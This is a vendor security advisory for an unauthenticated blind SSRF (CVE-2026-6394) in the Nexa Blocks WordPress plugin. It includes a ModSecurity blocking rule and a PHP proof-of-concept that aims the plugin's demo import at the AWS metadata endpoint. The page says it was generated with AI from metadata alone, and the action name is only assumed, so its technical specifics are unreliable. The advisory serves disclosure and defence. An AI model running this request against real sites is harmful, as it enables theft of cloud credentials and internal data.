How does this vulnerability work?

The vulnerability arises from the import_demo() function, which accepts a URL in the demo_json_file POST parameter and passes it directly to wp_remote_get() without validation. This allows attackers to exploit the function to access internal services or cloud metadata endpoints.

Who is affected by this vulnerability?

Any WordPress site using the Nexa Blocks plugin version 1.1.1 or earlier is affected. Administrators can check their plugin version in the WordPress admin panel under the Plugins section.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify that you are using Nexa Blocks version 1.1.1 or earlier. Additionally, review your site’s AJAX requests to see if the demo_json_file parameter is being used without proper validation.

What is the recommended remediation for this vulnerability?

The recommended remediation is to update the Nexa Blocks plugin to a version that includes a patch for this vulnerability. If no patch is available, consider disabling or removing the plugin until a fix is released.

How can I mitigate the risk of this vulnerability?

Mitigation can include implementing strict URL validation for the demo_json_file parameter, ensuring only safe URLs are accepted. Additionally, avoid exposing sensitive nonces in public-facing code.

What does the CVSS score of 5.4 indicate?

The CVSS score of 5.4 indicates a medium severity vulnerability. This suggests that while the vulnerability may not be easily exploitable, it poses a significant risk if successfully exploited, potentially leading to information leaks.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to unauthorized access to internal services and sensitive data, including cloud metadata. This could result in the exposure of credentials and other confidential information.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can send a crafted POST request to the WordPress AJAX handler, using the demo_json_file parameter to target internal services. It illustrates the ease of exploiting the vulnerability without authentication.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin, the best immediate action is to disable or remove the Nexa Blocks plugin to prevent potential exploitation. Monitor your site for any unusual activity as well.

Are there any known exploits for this vulnerability?

As of now, there are no widely reported active exploits for CVE-2026-6394, but the nature of the vulnerability makes it a target for attackers. It is advisable to take preventive measures until a patch is available.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 21, 2026

CVE-2026-6394: Nexa Blocks <= 1.1.1 – Unauthenticated Blind Server-Side Request Forgery via 'demo_json_file' Parameter (nexa-blocks)

Q: What is CVE-2026-6394?

CVE-2026-6394 is a Server-Side Request Forgery (SSRF) vulnerability in the Nexa Blocks plugin for WordPress, affecting versions up to and including 1.1.1. It allows unauthenticated attackers to send arbitrary HTTP requests to internal or external services through a user-supplied URL parameter.

CVE ID CVE-2026-6394

Plugin nexa-blocks

Severity Medium (CVSS 5.4)

CWE 918

Vulnerable Version 1.1.1

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6394 (metadata-based): This vulnerability affects the Nexa Blocks plugin for WordPress, versions up to and including 1.1.1. It allows unauthenticated attackers to perform blind Server-Side Request Forgery (SSRF) through the import_demo() function, which accepts a user-supplied URL via the demo_json_file POST parameter without validation. The CVSS score is 5.4 (medium severity), with network access, high attack complexity, no privileges required, no user interaction, and a changed scope. The impact is limited to low confidentiality and low integrity leaks.

Root Cause: The import_demo() function directly passes the user-supplied demo_json_file parameter to wp_remote_get() without any URL validation or restriction against internal or private network destinations. The nonce (nexa_blocks_nonce) required by the AJAX action is exposed via wp_localize_script on the enqueue_block_assets hook, making it publicly available on any frontend page where the plugin is active. This effectively nullifies the authentication barrier, allowing unauthenticated attackers to trigger the SSRF. A secondary vector allows fetching image URLs extracted from the attacker-controlled JSON response via another wp_remote_get() call, enabling chained exploitation. Atomic Edge analysis confirms these conclusions are directly stated in the vulnerability description, as no source code was available for verification.

Exploitation: An attacker sends a POST request to /wp-admin/admin-ajax.php with action set to the plugin’s AJAX handler (likely ‘nexa_blocks_import_demo’ or similar) and the demo_json_file parameter set to a target URL, such as http://169.254.169.254/latest/meta-data/ (AWS metadata endpoint) or http://127.0.0.1:8080/ (internal service). The attacker also includes the publicly exposed nonce (nexa_blocks_nonce) which can be scraped from the frontend HTML source. The server then makes HTTP requests to these internal services and returns the response (or performs blind, out-of-band actions) via the AJAX response or error messages. A crafted JSON payload can cause additional image fetch requests to different internal hosts, expanding the attack surface.

Remediation: The plugin must validate the demo_json_file parameter by implementing a strict allowlist of permitted URLs or URL patterns (e.g., only allowing specific external demo content servers). URL validation must check the scheme (only https://), domain, and optionally path, rejecting any internal IP addresses (e.g., 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16) and private hostnames like ‘localhost’ or ‘*.internal’. Additionally, the nonce should be scoped to authenticated user roles, not exposed on public-facing hooks, or the AJAX handler should enforce a capability check. Without a patch from the developer, the recommended immediate action is to disable or remove the plugin.

Impact: Successful exploitation allows an unauthenticated attacker to probe internal network services, cloud metadata endpoints (AWS, GCP, Azure), and localhost services that are not intended for public access. This can leak sensitive information such as cloud instance credentials, internal application data, configuration files, or service passwords. The secondary image fetch vector increases the risk by allowing data exfiltration through chained requests. Although the CVSS confidentiality impact is low, the real-world impact can be severe depending on the target environment, potentially leading to privilege escalation or lateral movement within the cloud infrastructure.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6394 (metadata-based)
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20263941,phase:2,deny,status:403,chain,msg:'CVE-2026-6394 - Nexa Blocks SSRF via AJAX',severity:'CRITICAL',tag:'CVE-2026-6394'"
  SecRule ARGS_POST:action "@streq nexa_blocks_import_demo" "chain"
    SecRule ARGS_POST:demo_json_file "@rx ^(https?://(localhost|127.0.0.1|10.|172.(1[6-9]|2[0-9]|3[01]).|192.168.|169.254.|[0-9]+.[0-9]+.[0-9]+.[0-9]+)|.*@.*|.*..*internal.*)" 
      "chain"
      SecRule ARGS_POST:demo_json_file "!@rx ^https?://[a-z0-9.-]+.example.com/.*" 
        "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6394 - Nexa Blocks <= 1.1.1 - Unauthenticated Blind Server-Side Request Forgery via 'demo_json_file' Parameter

// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress site URL
$endpoint = $target_url . '/wp-admin/admin-ajax.php';
// The nonce is publicly exposed; you can scrape it from the frontend HTML or try without it (some versions may work)
$nonce = 'YOUR_SCRAPED_NONCE'; // Replace with actual nonce value from the site

// Payload: use a localhost or internal service URL to test SSRF
$internal_target = 'http://169.254.169.254/latest/meta-data/'; // AWS metadata endpoint

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'nexa_blocks_import_demo', // Assumed action name; adjust if different
    'demo_json_file' => $internal_target,
    'nexa_blocks_nonce' => $nonce
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);

if ($error) {
    echo "[!] cURL Error: $errorn";
} else {
    echo "[*] HTTP Status: $http_coden";
    echo "[*] Response:n$responsen";
    // Analyze response: if it contains metadata or error messages with internal content, SSRF succeeded
}
?>

Frequently Asked Questions

What is CVE-2026-6394?
Understanding the vulnerability
CVE-2026-6394 is a Server-Side Request Forgery (SSRF) vulnerability in the Nexa Blocks plugin for WordPress, affecting versions up to and including 1.1.1. It allows unauthenticated attackers to send arbitrary HTTP requests to internal or external services through a user-supplied URL parameter.
How does this vulnerability work?
Mechanics of the exploitation
The vulnerability arises from the import_demo() function, which accepts a URL in the demo_json_file POST parameter and passes it directly to wp_remote_get() without validation. This allows attackers to exploit the function to access internal services or cloud metadata endpoints.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Nexa Blocks plugin version 1.1.1 or earlier is affected. Administrators can check their plugin version in the WordPress admin panel under the Plugins section.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify that you are using Nexa Blocks version 1.1.1 or earlier. Additionally, review your site’s AJAX requests to see if the demo_json_file parameter is being used without proper validation.
What is the recommended remediation for this vulnerability?
Fixing the issue
The recommended remediation is to update the Nexa Blocks plugin to a version that includes a patch for this vulnerability. If no patch is available, consider disabling or removing the plugin until a fix is released.
How can I mitigate the risk of this vulnerability?
Preventative measures
Mitigation can include implementing strict URL validation for the demo_json_file parameter, ensuring only safe URLs are accepted. Additionally, avoid exposing sensitive nonces in public-facing code.
What does the CVSS score of 5.4 indicate?
Understanding risk levels
The CVSS score of 5.4 indicates a medium severity vulnerability. This suggests that while the vulnerability may not be easily exploitable, it poses a significant risk if successfully exploited, potentially leading to information leaks.
What are the practical risks of this vulnerability?
Real-world implications
Exploitation of this vulnerability can lead to unauthorized access to internal services and sensitive data, including cloud metadata. This could result in the exposure of credentials and other confidential information.
How does the proof of concept demonstrate the vulnerability?
Technical illustration of the exploit
The proof of concept shows how an attacker can send a crafted POST request to the WordPress AJAX handler, using the demo_json_file parameter to target internal services. It illustrates the ease of exploiting the vulnerability without authentication.
What should I do if I cannot update the plugin immediately?
Immediate actions to take
If you cannot update the plugin, the best immediate action is to disable or remove the Nexa Blocks plugin to prevent potential exploitation. Monitor your site for any unusual activity as well.
Are there any known exploits for this vulnerability?
Current state of exploitation
As of now, there are no widely reported active exploits for CVE-2026-6394, but the nature of the vulnerability makes it a target for attackers. It is advisable to take preventive measures until a patch is available.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations